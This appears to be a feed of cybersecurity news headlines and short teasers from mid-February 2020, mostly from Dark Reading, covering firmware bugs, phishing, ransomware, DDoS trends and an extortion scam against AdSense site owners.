Firmware Weaknesses Can Turn Computer Subsystems into Trojans
by Robert Lemos Contributing Writer on 18 Febbraio 2020 at 2:00 pm
Network cards, video cameras, and graphics adapters are a few of the subsystems whose lack of security could allow attackers to turn them into spy implants.
The Road(s) to Riches
by Beyond the Edge Dark Reading on 18 Febbraio 2020 at 1:30 pm
You could be making millions in just two years!
Staircase to the Cloud: Dark Reading Caption Contest Winners
by Marilyn Cohodas Managing Editor, Dark Reading on 18 Febbraio 2020 at 1:30 pm
A humorous nod to the lack of gender equity in cybersecurity hiring was our judges' unanimous choice. And the winners are ...
Hacker Scheme Threatens AdSense Customers with Account Suspension
by Elizabeth Montalbano on 18 Febbraio 2020 at 1:26 pm
Scam threatens to flood sites using Google’s banner-ad program with bot and junk traffic if owners don’t pay $5K in bitcoin.
8 Things Users Do That Make Security Pros Miserable
by Curtis Franklin Jr. Senior Editor at Dark Reading on 18 Febbraio 2020 at 1:00 pm
When a user interacts with an enterprise system, the result can be productivity or disaster. Here are eight opportunities for the disaster side to win out over the productive.
Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs
by Tara Seals on 18 Febbraio 2020 at 11:00 am
A lack of proper code-signing verification and authentication for firmware updates opens the door to information disclosure, remote code execution, denial of service and more.
Martin and Dorothie Hellman on Love, Crypto & Saving the World
by Sara Peters Senior Editor at Dark Reading on 15 Febbraio 2020 at 12:00 pm
Martin Hellman, co-creator of the Diffie-Hellman key exchange, and his wife of 53 years, Dorothie, talk about the current state of cryptography and what making peace at home taught them about making peace on Earth.
Phishing Campaign Targets Mobile Banking Users
by Jai Vijayan Contributing Writer on 14 Febbraio 2020 at 10:10 pm
Consumers in dozens of countries were targeted, Lookout says.
Palm Beach Elections Office Hit with Ransomware Pre-2016 Election
by Dark Reading Staff on 14 Febbraio 2020 at 7:20 pm
Palm Beach County's elections supervisor does not believe the attack is linked to Russian hacking attempts targeting Florida.
Ovum to Expand Cybersecurity Research Under New Omdia Group
by Dark Reading Staff on 14 Febbraio 2020 at 6:00 pm
Informa Tech combines Ovum, Heavy Reading, Tractica, and IHS Markit research.
DHS Warns of Cyber Heartbreak
by Dark Reading Staff on 14 Febbraio 2020 at 5:55 pm
Fraudulent dating and relationship apps and websites raise the risks for those seeking online romance on Valentine's Day.
The 5 Love Languages of Cybersecurity
by Fredrick "Flee" Lee Chief Security Officer, Gusto on 14 Febbraio 2020 at 3:00 pm
When it comes to building buy-in from the business, all cybersecurity needs is love -- especially when it comes to communication.
Coronavirus Raises New Business Continuity, Phishing Challenges for InfoSec
by Sara Peters Senior Editor at Dark Reading on 14 Febbraio 2020 at 12:25 am
What happens when understaffed security teams at home and abroad are sequestered in physical quarantine zones?
DDoS Attacks Nearly Double Between Q4 2018 and Q4 2019
by Kelly Sheridan Staff Editor, Dark Reading on 13 Febbraio 2020 at 9:45 pm
Peer-to-peer botnets, TCP reflection attacks, and increased activity on Sundays are three DDoS attack trends from last quarter.
Architectural Analysis IDs 78 Specific Risks in Machine-Learning Systems
by Jai Vijayan Contributing Writer on 13 Febbraio 2020 at 9:35 pm
The new threat model hones in on ML security at the design state.
Babel of IoT Authentication Poses Security Challenges
by Robert Lemos Contributing Writer on 13 Febbraio 2020 at 8:50 pm
With more than 80 different schemes for authenticating devices either proposed or implemented, best practices and reference architectures are sorely needed, experts say.